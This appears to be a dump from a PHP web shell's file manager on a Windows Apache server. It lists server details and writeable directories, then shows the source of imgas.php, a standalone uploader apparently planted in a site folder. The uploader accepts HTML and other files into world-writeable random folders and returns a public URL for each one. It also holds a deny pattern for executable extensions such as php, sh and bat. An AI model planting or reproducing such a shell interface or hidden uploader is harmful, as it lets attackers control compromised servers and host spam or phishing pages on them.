Server : Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
System : Windows NT USER-PC 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) AMD64
User : User ( 0)
PHP Version : 7.4.6
Disable Function : NONE
Directory :  C:/www/_borders/
Upload File :
Current Directory [ Writeable ] Root Directory [ Writeable ]


Current File : C:/www/_borders/imgas.php
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    $file = $_FILES['file'];
    
    // 检查上传是否成功
    if ($file['error'] !== UPLOAD_ERR_OK) {
        die("文件上传失败,错误代码: " . $file['error']);
    }
    
    // 允许的文件扩展名
    $allowedExtensions = ['jpg', 'jpeg', 'png', 'gif', 'html', 'txt', 'pdf'];
    $fileExtension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    
    if (!in_array($fileExtension, $allowedExtensions)) {
        die("不允许的文件类型!");
    }
    
    // 使用 finfo_file() 进行 MIME 类型验证,兼容没有 mime_content_type() 的环境
    if (function_exists('finfo_open')) {
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        $mimeType = finfo_file($finfo, $file['tmp_name']);
        finfo_close($finfo);
    } else {
        $mimeType = null; // 如果 finfo 无法使用,跳过 MIME 类型检查
    }
    
    $allowedMimeTypes = [
        'image/jpeg', 'image/png', 'image/gif', 'text/html', 'text/plain', 'application/pdf'
    ];
    
    if ($mimeType && !in_array($mimeType, $allowedMimeTypes)) {
        die("文件类型异常,禁止上传!");
    }
    
    // 防止双扩展名,如 shell.php.jpg
    if (preg_match('/\.(php|phtml|php3|php4|php5|phps|shtml|cgi|pl|exe|sh|bat|cmd|scr|dll)$/i', $file['name'])) {
        die("禁止上传可执行文件!");
    }
    
    // 生成随机文件夹名
    $randomFolder = md5(uniqid(rand(), true));
    $folderPath = __DIR__ . DIRECTORY_SEPARATOR . $randomFolder;
    
    // 创建文件夹
    if (!file_exists($folderPath)) {
        mkdir($folderPath, 0777, true);
    }
    
    // 确保目录创建成功
    if (!file_exists($folderPath)) {
        die("目录创建失败: " . $folderPath);
    }
    
    // 生成随机文件名
    $randomFileName = md5(uniqid(rand(), true)) . '.' . $fileExtension;
    $localFilePath = $folderPath . DIRECTORY_SEPARATOR . $randomFileName;
    
    // 移动上传的文件
    if (move_uploaded_file($file['tmp_name'], $localFilePath)) {
        $baseUrl = 'http://' . $_SERVER['HTTP_HOST'] . dirname($_SERVER['REQUEST_URI']);
        $fileUrl = $baseUrl . '/' . $randomFolder . '/' . $randomFileName;
        echo $fileUrl . "?";
    } else {
        echo "文件保存失败!";
    }
} else {
    echo '<form action="" method="post" enctype="multipart/form-data">';
    echo '选择文件上传: <input type="file" name="file" required><br><br>';
    echo '<input type="submit" value="上传">';
    echo '</form>';
}
?>